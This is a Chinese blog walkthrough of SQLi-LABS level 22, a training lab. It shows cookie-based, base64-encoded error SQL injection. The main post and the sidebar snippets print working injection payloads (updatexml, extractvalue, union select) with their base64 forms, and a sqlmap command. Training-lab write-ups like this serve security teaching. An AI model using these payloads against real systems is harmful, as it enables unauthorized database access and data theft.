SQLi LABS Less-22

最新推荐文章于 2024-01-15 11:21:42 发布
最新推荐文章于 2024-01-15 11:21:42 发布
阅读量1.1w 收藏 1
点赞数 3
分类专栏: SQLi-LABS 靶场通关教程 文章标签: 网络安全 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wangyuxiang946/article/details/119706983
版权

第22关使用POST请求提交参数,对账号和密码中的特殊字符执行了转译的操作,难度较大

这一关的重点在于Cookie,用户登录成功后,将base64编码后的用户名保存到Cookie中

 点击提交按钮时,会从Cookie中获取用户名,使用base64解码后,查询数据库,以此来判断用户是否处于登录状态,我们可以利用Cookie来进行SQL注入

 

将payload使用base64进行编码

1" and updatexml(1,0x7e,1) -- a
MSIgYW5kIHVwZGF0ZXhtbCgxLDB4N2UsMSkgLS0gYQ==

 将Cookie中uname的值修改为base64编码后的payload

 报错成功,修改payload脱库即可

 

22关和21关用的是同一个界面,这也...

士别三日wyx
关注
  • 3
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-labs/Less-22
m0_71299382的博客
11-19 158
sqli-labs第二十二
SQLI-LABS 靶场通小记(1~22
曹振国的博客
07-14 2725
1~22Less-1:1.查询字段数2.查询输出点3.查询库名4.查询表名5.查询字段名6.查询数据Less-2:1.查询输出点Less-3:1.查询输出点Less-4:1.查询输出点Less -5:1.使用left()函数进行截取测试2.使用length判断长度3.利用ascii码猜测数据库名4.使用二分法进行盲注查表名Less-6:1.使用length判断长度Less-7:1.查看源码2.写入一句话木马连接蚁剑Less-8:1.使用length判断长度Less-9:1.使用sleep()函数进行时间盲注
sqli-labs第22基于cookie报错注入(base64转码)
qq_46527080的博客
12-25 453
22基于cookie报错注入 sqlmap 方法 python2 sqlmap.py -r 1.txt --cookie uname=YWRtaW4= --tech E --dbms mysql --tamper base64encode.py --batch -v 0 手注 一、判断注入点 通过源码我们可以发现,闭合点是双引号 然后我们基于21进行构造语句 一、猜注入点: admin " and extractvalue(1,concat(0x7e,( 1),0x7e))# YWRtaW4gI
sqli-labs22(基于cookie被base64编码的报错盲注)
最新发布
zyh1588的博客
01-15 985
小白回顾sql靶场22
sqli-labs11-22心得与思路
m0_48294281的博客
03-28 3946
sqli-labs11-22心得与思路
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
jeakinscheung-sqli-labs-php7-master.zip
03-16
sqli创建数据库连接发现连接不了,这种原因是现在大部分人用的php7,原版的sqli只支持php5.
sqli-labs通(十八)~(二十二)
qq_65950075的博客
05-05 502
输入正确的账号密码,就会返回显示我们的User Agent信息,这是在我们的post请求里面的信息所以我们用burp suite拦截抓包那我们就可以对这个User Agent下手进行注入当我们把它改成1'时,出现如下报错信息,可以知道语句是由单引号和括号闭合的,但是还有两个参数打开源码看一下有一个insert语句,有三个参数,把我们的User Agent,IP和username插入到数据库的security.uagents中所以我们构造正常,没有语法报错。
小白勇闯sqli-labs-master1-22
weixin_56594114的博客
07-25 120
id=1 and 1=2 --+ Flase页面异常。id=1 and 1=2 --+ Flase页面异常。id=1 and 1=2 --+ Flase页面异常。id=1 and 1=2 --+ Flase页面异常。id=1 and 1=1 --+ True页面正常。id=1 and 1=1 --+ True页面正常。id=1 and 1=1 --+ True页面正常。id=1 and 1=1 --+ True页面正常。输入admin') and 1=1 # 存在注入。输入正确的用户名密码,显示如下页面。
Sqlilabs-22
KAKA的博客
07-09 379
这里来到了第一阶段的最后一22 其实跟 21 一样,只不过变成了双引号 " 而已,直接上菜吧o( ̄▽ ̄)ブ uname=YWRtaW4iIGFuZCBleHRyYWN0dmFsdWUoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IGRhdGFiYXNlKCkpLDB4N2UpKSM= uname=admin" and extractvalue(1,concat(0x7e,(select database()),0x7e))# 怎么猜单引号加括号,这里当你构造好 payload pos
sqli-lab18和22详解
cangyu51462的博客
05-01 469
sqli-lab18和22详解
sqli-labs————less 22
Fly_鹏程万里
05-12 391
Less 22简单测试:username:adminpassword:aaa查看一下源代码如下:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://w...
sqli-labs-less-22 图文笔记
yzcn
12-03 253
Less-22 正常登陆: 查看一下cookie: 利用解密工具破解,value为admin,因此该卡与less-21类似,我们知道加密解密方式后开始判断注入点: 更改cookie为admin”,返回错误: 更改为admin”#,返回正常,说明闭合方式为””,现在可以开始注入。 获取当前数据库: " union select 1,2,database()#加密后得到: IiB1bmlvbiBzZWxlY3QgMSwyLGRhdGFiYXNlKCkj 获取security库中的表: " union
sqli-labs靶场(1-22
weixin_51566481的博客
08-16 7261
sqli-labs,sql注入,burpsuit
sqli-labs靶场第二十二
gou1791241251的博客
12-31 423
第二十二cookie编码注入! 当我使用")编码后放入cookie中去请求发现报错了!说明很可能是")闭合的 没注入成功,试一下 " , ’ , ‘)这几种情况吧 或不输入单引号和双引号把爱 " and extractvalue(1,concat(’^’,(select database()),’^’)) --+ 注入失败 " and extractvalue(1,concat(’^’,(select database()),’^’)) # 注入成功 这里发现一个问题,在cookie注入时,使用–
sqli-labs-master第2122
m_ing
05-16 1523
前言:昨天我们研究了http头部cookie注入,反正我是让让抓包软件给搞死了,废了老半天劲!我们来研究下加密后的cookie 第21: 看到这个页面我们还是输入用户密码,返回了这个页面 提示了一系列的信息 我们还是抓包分析下 看到了加密后的cookie 我们查看源代码,看看是怎样的加密方式 是被base64加码算法加密了 我们找个解密软件或者相的程序 我们输入的用户就是admin所以解密正确 先构造语句验证是否存在注入,admin’经过base64编码后YWRtaW4n,带入测试发现报错
Sqlilabs11-22卡详解(Post式)
爱吃仡坨的Blog
10-18 874
我们随便输入一个内容,只有一个登陆失败的图片并没有带有sql语法的报错回显通过构造一个错误的语法ggbond'单引号;发现有sql语句的错误回显;我们可以判断出此登陆界面是通过单引号闭合的构造一个恒成立的sql语句,发现爆出其登陆的用户名和密码通过orderby函数判断出有两个字段通过union查询 爆出其字段所在位置,如图所示。
Sqli-labs-master less1-22笔记
skynet_x的博客
10-28 486
#Sqli-labs-master 1-22 实验环境:Windows7 x64 专业版 ​ PHPstudy 2018 ​ PHP版本 5.4.45 ​ 靶机:Sqli-labs-master 注:LESS1-10为GET型注入 11-22为POST型注入 每道题解法不一定唯一 对于手法重复的卡均未赘述 ##第一:单引号报错 本所用到的函数: ​ database() ---- 数据库名 ​ concat(str1,str2,…) ---- 没有
sqli-labs-less-7
09-26
在这个例子中,查询的结果将被导出到文件"E:\\phpStudy_64\\phpstudy_pro\\WWW\\sqlilabs\\Less-7\\1.txt"中。 通过这些步骤,我们可以成功执行SQL注入攻击,并将查询结果保存到指定的文件中。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

士别三日wyx

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值